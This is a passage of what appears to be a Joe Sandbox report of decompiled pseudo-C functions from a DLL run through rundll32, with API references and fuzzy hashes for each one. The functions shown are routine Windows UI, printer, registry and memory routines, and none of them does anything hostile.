				_t104 = __ecx;
				_push(0x3c);
				E10017BF4(E1002800E, __ebx, __edi, __esi);
				_t103 = __ecx;
				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
				_t136 =  *(_t132 + 0x10);
				if( *(_t132 + 0x10) == 0) {
					 *(_t132 + 0x10) =  *(E1000D5EC(__ecx, 0, __esi, _t136) + 0xc);
				}
				_t129 =  *(E1000D5EC(_t103, 0, _t128, _t136) + 0x3c);
				 *(_t132 - 0x28) = _t129;
				 *(_t132 - 0x14) = 0;
				 *(_t132 - 4) = 0;
				E10012406(_t103, _t104, 0, _t129, _t136, 0x10);
				E10012406(_t103, _t104, 0, _t129, _t136, 0x7c000);
				if(_t129 == 0) {
					_t130 =  *(_t132 + 8);
					L7:
					__eflags = _t130;
					if(_t130 == 0) {
						L4:
						_t65 = 0;
						L32:
						return E10017C60(_t65);
					}
					E10009E23(_t132 - 0x1c, E10013479());
					 *(_t132 - 4) = 1;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					__eflags = E10014A97(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
					__eflags =  *0x1005aa84; // 0x0
					_t72 = 0 | __eflags == 0x00000000;
					if(__eflags == 0) {
						L14:
						__eflags = _t72;
						if(__eflags == 0) {
							L17:
							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
							E100115DC(0, __eflags, _t103);
							_t74 =  *(_t132 + 0xc);
							__eflags = _t74;
							if(_t74 != 0) {
								_t75 =  *(_t74 + 0x20);
							} else {
								_t75 = 0;
							}
							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E1000C402, 0);
							E10009CB7( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
							_t110 =  *(_t132 - 0x28);
							__eflags = _t110;
							if(__eflags != 0) {
								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
								__eflags = _t131;
								if(__eflags != 0) {
									 *((intOrPtr*)( *_t103 + 0x12c))(0);
								}
							}
							_t78 = E1000FC04(_t103, 0, __eflags);
							__eflags = _t78;
							if(_t78 == 0) {
								 *((intOrPtr*)( *_t103 + 0x114))();
							}
							__eflags = _t131;
							if(_t131 != 0) {
								__eflags =  *(_t103 + 0x3c) & 0x00000010;
								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
									DestroyWindow(_t131);
									_t131 = 0;
									__eflags = 0;
								}
							}
							__eflags =  *(_t132 - 0x14);
							if( *(_t132 - 0x14) != 0) {
								GlobalUnlock( *(_t132 - 0x14));
								GlobalFree( *(_t132 - 0x14));
							}
							__eflags = _t131;
							_t59 = _t131 != 0;
							__eflags = _t59;
							_t65 = 0 | _t59;
							goto L32;
						}
						L15:
						E10014A60(_t103, _t132 - 0x38, 0, _t132, _t130);
						 *(_t132 - 4) = 2;
						E100149BE(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
						 *(_t132 - 0x14) = E100146D7(_t132 - 0x38);
						 *(_t132 - 4) = 1;
						E100146C9(_t132 - 0x38);
						__eflags =  *(_t132 - 0x14);
						if(__eflags != 0) {
							_t130 = GlobalLock( *(_t132 - 0x14));
						}
						goto L17;
					}
					__eflags = _t72;
					if(_t72 != 0) {
						goto L15;
					}
					__eflags = GetSystemMetrics(0x2a);
					if(__eflags == 0) {
						goto L17;
					}
					_t95 = E1000C95C(_t132 - 0x1c, "MS Shell Dlg");
					__eflags = _t95;
					_t72 = 0 | _t95 == 0x00000000;
					__eflags = _t72;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *((short*)(_t132 - 0x18)) - 8;
					if( *((short*)(_t132 - 0x18)) == 8) {
						 *((intOrPtr*)(_t132 - 0x18)) = 0;
					}
					goto L14;
				}
				_push(_t132 - 0x48);
				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
					goto L7;
				}
				goto L4;
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 1000C98B
GetSystemMetrics.USER32 ref: 1000CA3C
GlobalLock.KERNEL32 ref: 1000CAA5
CreateDialogIndirectParamA.USER32(?,?,?,1000C402,00000000), ref: 1000CAD4

Strings

MS Shell Dlg, xrefs: 1000CA46

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
String ID: MS Shell Dlg
API String ID: 1736106359-76309092
Opcode ID: 0836612ccd89b939986456284b221daff64c2c444739792d891f2b66984f1eb5
Instruction ID: aca18bfbc2af702d8352a65e986f2fe47acd8ccb78c3dcc49b793ffb13d9be50
Opcode Fuzzy Hash: 0836612ccd89b939986456284b221daff64c2c444739792d891f2b66984f1eb5
Instruction Fuzzy Hash: AF51A031A0020D9FDB05DFA4C88ADEEBBB4EF45780F254559F442EB199DB349E81CB52

Uniqueness

Uniqueness Score: -1.00%

Function 100149BE, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E100149BE(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x10057a08; // 0xcbf72908
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E100167D5(E1001486F(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

APIs

GetStockObject.GDI32(00000011), ref: 100149E4
GetStockObject.GDI32(0000000D), ref: 100149EC
GetObjectA.GDI32(00000000,0000003C,?), ref: 100149F9
GetDC.USER32(00000000), ref: 10014A08
GetDeviceCaps.GDI32(00000000,0000005A), ref: 10014A1C
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 10014A28
ReleaseDC.USER32 ref: 10014A34

Strings

System, xrefs: 100149DF, 10014A49

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
Instruction ID: a63e4a091ca1b7be2859df30e5517b7a4abcdff67d16382c886f5131b7cbdf71
Opcode Fuzzy Hash: a6886f26645baa5a84af5b89923cd17d43b4ad3fa3ddc4ab300892a0af884a22
Instruction Fuzzy Hash: 39118F71A40268EBEB10DBA1CC85FAE7BB8FF04781F420015FA02AA190DE709D46CB65

Uniqueness

Uniqueness Score: -1.00%

Function 10009360, Relevance: 13.6, APIs: 9, Instructions: 105
windowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E10009360(intOrPtr __ecx, intOrPtr _a4) {
				long _v8;
				intOrPtr _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				signed int _t38;
				long _t49;
				intOrPtr _t50;
				void* _t60;
				long _t76;
				void* _t84;
				void* _t85;

				_v32 = __ecx;
				if(_a4 == 8) {
					return E100090F0(_t60, _v32, _t84, _t85);
				}
				if(_a4 == 9) {
					_t38 =  *0x10058ece & 0x000000ff;
					if(_t38 != 0) {
						_v8 = SendMessageA( *(_v32 + 0x94), 0xe, 0, 0);
						_v12 = _v32 + 0x74;
						SendMessageA( *(_v12 + 0x20), 0xb1, _v8, _v8);
						if(0 == 0) {
							SendMessageA( *(_v12 + 0x20), 0xb7, 0, 0);
						}
						_t76 =  *0x10058f0c; // 0x1005aa2c
						_v16 = _t76;
						SendMessageA( *(_v32 + 0x94), 0xc2, 0, _v16);
						if(_v8 > 0x1000) {
							_t50 =  *0x10058f0c; // 0x1005aa2c
							_t21 = _t50 - 0xc; // 0x0
							_v20 =  *_t21;
							_v24 = _v32 + 0x74;
							SendMessageA( *(_v24 + 0x20), 0xb1, 0, _v20);
							if(0 == 0) {
								SendMessageA( *(_v24 + 0x20), 0xb7, 0, 0);
							}
							SendMessageA( *(_v32 + 0x94), 0xc2, 0, 0x100295fc);
						}
						_v28 = SendMessageA( *(_v32 + 0x94), 0xba, 0, 0);
						_t49 = SendMessageA( *(_v32 + 0x94), 0xb6, 0, _v28);
						 *0x10058ece = 0;
						return _t49;
					}
				}
				return _t38;
			}

APIs

SendMessageA.USER32 ref: 100093A5
SendMessageA.USER32 ref: 100093CB
SendMessageA.USER32 ref: 100093E5
SendMessageA.USER32 ref: 10009409
SendMessageA.USER32 ref: 1000943E
SendMessageA.USER32 ref: 10009458
SendMessageA.USER32 ref: 10009474
SendMessageA.USER32 ref: 1000948D
SendMessageA.USER32 ref: 100094AB

Part of subcall function 100090F0: _strlen.LIBCMT ref: 100091CA
Part of subcall function 100090F0: _strlen.LIBCMT ref: 100091E4

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$_strlen
String ID:
API String ID: 3697954797-0
Opcode ID: 2ffd05dad576676297fb9eaf6dbc442549bb5f90649f9ff9e88f90ce09603060
Instruction ID: 329eb70852e0cb7846d89551eaf01311ead5dc39bdcc3cc6f9670776eeec1b90
Opcode Fuzzy Hash: 2ffd05dad576676297fb9eaf6dbc442549bb5f90649f9ff9e88f90ce09603060
Instruction Fuzzy Hash: BE411974A40205AFEB04CBA4CD99FAEB7B5FB4C740F208159FA45AB3D5C775AA02CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013C4D, Relevance: 13.6, APIs: 9, Instructions: 96
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E10013C4D(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E10017BF4(E10028893, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E10013965(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x1002b1d8;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E10013A82( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E100134F9(_t51, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E100134F9(_t51, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E1000A0A7(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E100174D0(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E10017C60(_t36);
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 10013C54
EnterCriticalSection.KERNEL32(?,00000010,10013E18,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013C65
TlsGetValue.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013C83
LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013CB7
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23
_memset.LIBCMT ref: 10013D42
TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
String ID:
API String ID: 1891723912-0
Opcode ID: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
Instruction ID: 361604de1dd3242a2b5db774f8c39e7d6c7c8771dcfb3c7945be7f3a81b5ec95
Opcode Fuzzy Hash: 98e6fda5490af90b613d29fe93ebf23f0a89dab0f12f059d821b20a9314a5678
Instruction Fuzzy Hash: 3F317C74500616AFDB20DF65E886C5EBBB5FF04350B21C529F95AAB661CB30ED90CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1000A6E3, Relevance: 12.1, APIs: 8, Instructions: 65
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000A6E3(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E10014056(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E10014056( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}

APIs

GlobalLock.KERNEL32 ref: 1000A700
lstrcmpA.KERNEL32(?,?), ref: 1000A70C
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1000A71E
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A73E
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1000A746
GlobalLock.KERNEL32 ref: 1000A750
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 1000A75D
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 1000A775

Part of subcall function 10014056: GlobalFlags.KERNEL32(?), ref: 10014061
Part of subcall function 10014056: GlobalUnlock.KERNEL32(?,?,?,1000A4C2,?,00000004,1000146F), ref: 10014073
Part of subcall function 10014056: GlobalFree.KERNEL32 ref: 1001407E

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
Instruction ID: f32a97280aef975bd063cd01cc2dace1ac46c13f829f9411547ae7bffa227ebc
Opcode Fuzzy Hash: c5ddca194c607ea35f329f4eccdab628960a2426db6b20382c350f57d95b32d7
Instruction Fuzzy Hash: ED11A075500600BBEB22CBBADC89DAF7AFDFB89B807104519F60AD5021DB31DD91DB20

Uniqueness

Uniqueness Score: -1.00%

Function 10013854, Relevance: 12.0, APIs: 8, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013854(void* __ecx) {
				struct HDC__* _t18;
				void* _t19;

				_t19 = __ecx;
				 *((intOrPtr*)(_t19 + 8)) = GetSystemMetrics(0xb);
				 *((intOrPtr*)(_t19 + 0xc)) = GetSystemMetrics(0xc);
				 *0x1005aa30 = GetSystemMetrics(2) + 1;
				 *0x1005aa34 = GetSystemMetrics(3) + 1;
				_t18 = GetDC(0);
				 *((intOrPtr*)(_t19 + 0x18)) = GetDeviceCaps(_t18, 0x58);
				 *((intOrPtr*)(_t19 + 0x1c)) = GetDeviceCaps(_t18, 0x5a);
				return ReleaseDC(0, _t18);
			}

0x1001385f
0x10013865
0x1001386c
0x10013874
0x1001387e
0x1001388f
0x10013899
0x100138a1
0x100138ad

APIs

GetSystemMetrics.USER32 ref: 10013861
GetSystemMetrics.USER32 ref: 10013868
GetSystemMetrics.USER32 ref: 1001386F
GetSystemMetrics.USER32 ref: 10013879
GetDC.USER32(00000000), ref: 10013883
GetDeviceCaps.GDI32(00000000,00000058), ref: 10013894
GetDeviceCaps.GDI32(00000000,0000005A), ref: 1001389C
ReleaseDC.USER32 ref: 100138A4

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
Instruction ID: d97b14313f3971f9b273ebf2d99ed84bfce9517748686708ee6192b13dda979b
Opcode Fuzzy Hash: db9cd225bf41a8a16edb532eadca07c49390effd78a228ecd5040edfe1a92329
Instruction Fuzzy Hash: CEF03071A40714AFFB20AF728CC9F677BA8EB81B51F11491AE6428B6D0D7B59806CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1000BD98, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
registryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E1000BD98(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
				char _v4;
				intOrPtr _v12;
				char* _v16;
				void* _v20;
				char* _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v272;
				char _v280;
				intOrPtr _v292;
				void* __ebp;
				signed int _t40;
				char _t44;
				void* _t47;
				void* _t54;
				char* _t61;
				void* _t77;
				void* _t80;
				void* _t81;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t101;
				char* _t104;

				_t95 = __edx;
				_t81 = __ecx;
				_t79 = __ebx;
				_t104 =  &_v272;
				_t40 =  *0x10057a08; // 0xcbf72908
				_a264 = _t40 ^ _t104;
				_push(0x18);
				E10017BC1(E10027F63, __ebx, __edi, __esi);
				_t100 = __ecx;
				_v20 = 0;
				_v32 = 0;
				_t44 = E1000BB54(__ecx, __edx);
				_v28 = _t44;
				if(_t44 != 0) {
					do {
						__eax =  &_v28;
						_push(__eax);
						__ecx = __esi;
						E1000BB65();
						__eflags = __eax - __edi;
						if(__eax != __edi) {
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
						}
						__eflags = _v28 - __edi;
					} while (_v28 != __edi);
				}
				__eflags =  *(_t100 + 0x54);
				if( *(_t100 + 0x54) == 0) {
					L15:
					 *[fs:0x0] = _v12;
					_pop(_t98);
					_pop(_t101);
					_pop(_t80);
					_t47 = E100167D5(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
					__eflags =  &_a268;
					return _t47;
				} else {
					__eflags =  *(_t100 + 0x68);
					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
					if(__eflags != 0) {
						_push("Software\\");
						E10009FA3(_t79,  &_v16, 0, _t100, __eflags);
						_v4 = 0;
						E10009F7E(_t79,  &_v16,  *(_t100 + 0x54));
						_push(0x1002a248);
						_push( &_v16);
						_push( &_v36);
						_t54 = E1000BC25(_t79, 0, _t100, __eflags);
						_push( *(_t100 + 0x68));
						_v4 = 1;
						_push(_t54);
						_push( &_v24);
						E1000BC25(_t79, 0, _t100, __eflags);
						_v4 = 3;
						E10009CB7(_v36 + 0xfffffff0, _t95);
						_push( &_v24);
						_push(0x80000001);
						E1000BC89(_t79, 0, 0x80000001, __eflags);
						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
						__eflags = _t61;
						if(_t61 == 0) {
							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
							if(__eflags == 0) {
								_push( &_v16);
								_push(0x80000001);
								E1000BC89(_t79, 0, 0x80000001, __eflags);
							}
							RegCloseKey(_v20);
						}
						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
						E10009CB7( &(_v24[0xfffffffffffffff0]), _t95);
						__eflags =  &(_v16[0xfffffffffffffff0]);
						E10009CB7( &(_v16[0xfffffffffffffff0]), _t95);
						goto L15;
					} else {
						_push(_t104);
						_push(_t81);
						_v280 = 0x10057298;
						E10017C83( &_v280, 0x1002e2fc);
						asm("int3");
						_push(4);
						E10017BC1(E10027DEC, _t79, 0, _t100);
						_t94 = E10013965(0x104);
						_v292 = _t94;
						_t77 = 0;
						_v280 = 0;
						if(_t94 != 0) {
							_t77 = E1000CF71(_t94);
						}
						return E10017C60(_t77);
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 1000BDB7
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1000BE73
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BE8A
RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 1000BEA4
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1000BEB6

Strings

Software\, xrefs: 1000BE0C

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CloseEnumH_prolog3OpenQueryValue
String ID: Software\
API String ID: 3878845136-964853688
Opcode ID: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
Instruction ID: bb9b01b2753fba5bda47465ad6778d866e06322e4a0b808ca87f46191af68194
Opcode Fuzzy Hash: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
Instruction Fuzzy Hash: 6241AC31900559AFEB11DFA4CC81EFEB7B9EF48390F20052AF552E2294DB74AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000F6F2, Relevance: 10.6, APIs: 7, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000F6F2(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				void* _t50;
				int _t53;
				long _t56;
				signed int _t62;
				intOrPtr* _t64;
				intOrPtr* _t67;
				void* _t68;

				_t63 = __ecx;
				_t62 = 1;
				_t67 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E10012862(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t67 + 0x20));
				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E1000B519(0);
				_t68 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t73 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E1000B911(_t63, 0, _t67, _t73);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E100128D7(_t67, 1);
									UpdateWindow( *(_t67 + 0x20));
									_t62 = 0;
